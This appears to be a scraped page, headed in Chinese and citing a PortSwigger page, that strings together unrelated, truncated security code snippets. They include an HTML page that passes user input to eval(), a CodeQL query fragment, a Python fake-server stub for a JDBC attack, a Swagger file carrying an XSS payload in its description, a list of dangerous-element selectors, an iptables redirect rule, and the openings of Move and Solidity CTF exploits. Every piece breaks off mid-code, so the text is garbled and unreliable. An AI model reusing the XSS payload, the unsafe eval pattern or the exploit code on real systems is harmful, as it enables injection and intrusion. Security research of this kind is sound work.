原文: https://portswigger.net/research/top-10-web-hacking-techniques-of-2023-nominations-open
分类: 漏洞披露-Ruby
<html> | |
<head> | |
<title>JavaScript Execution</title> | |
<script> | |
function executeCode() { | |
const input = document.getElementById('inputCode').value; | |
const output = document.getElementById('outputResult'); | |
try { | |
const result = eval(input); | |
output.textContent = result; |
// send 需要2 参数可控 | |
// public_send 需要 3 参数可控 | |
// (1) todo 对参数本身的类型检查 | |
// (2) todo 对方法本身的检查 | |
// (3) 对 location的检查, 去除 _spec.rb, _example.rb, 直接删除然后构建 database | |
import codeql.ruby.DataFlow | |
from DataFlow::CallNode call | |
where | |
call.getNumberOfArguments() = 2 and |
import struct | |
import asyncio | |
# JDBC 客户端会去请求的地址 | |
# 最终的请求: http://127.0.0.1:1881/.well-known/openid-configuration | |
url = "http://127.0.0.1:1881/" | |
# 自动化拼接字符串 | |
# 0x 是占位符, 大量的数据来自 OCR, 为了对齐缺少的行 |
{ | |
"swagger": "2.0", | |
"info": { | |
"description": "<select><template><img src=x onerror=alert(1)></template></select>", | |
"version": "1.0.6", | |
"title": "Swagger Petstore", | |
"termsOfService": "11", | |
"contact": { | |
"email": "apiteam@swagger.io" | |
}, |
dom.querySelector("script") || | |
dom.querySelector("svg") || | |
dom.querySelector("meta") || | |
dom.querySelector("x") || // todo: x:script | |
dom.querySelector("object[data]") || | |
dom.querySelector("iframe[src]") || | |
dom.querySelector("iframe[srcdoc]") || | |
dom.querySelector("embed[src]") || | |
dom.querySelector("base[href]") || | |
dom.querySelector("form[formaction]") || |
iptables -t nat -A OUTPUT -p tcp ! -d 127.0.0.1 -m owner --uid-owner 2000 -m multiport --dports 80,443 -j DNAT --to-destination 127.0.0.1:8080 | |
// code : https://github.com/movebit/movectf-6 | |
// sui move build --dump-bytecode-as-base64 --path . | |
// sui client publish --path ./ --gas-budget 30000 | |
module c6::exp { | |
use ctf::hero; | |
use ctf::adventure; | |
use sui::tx_context::TxContext; | |
public entry fun start( | |
h: &mut hero::Hero, ctx: &mut TxContext | |
): () { |
pragma solidity ^0.8.7; | |
interface Target { | |
function profit() external; | |
function guess(uint guess_secret) external; | |
function transfer(address to, uint amount) external; | |
function payforflag(string memory md5ofteamtoken,string memory b64email)external; | |
function withdraw(uint amount) external; |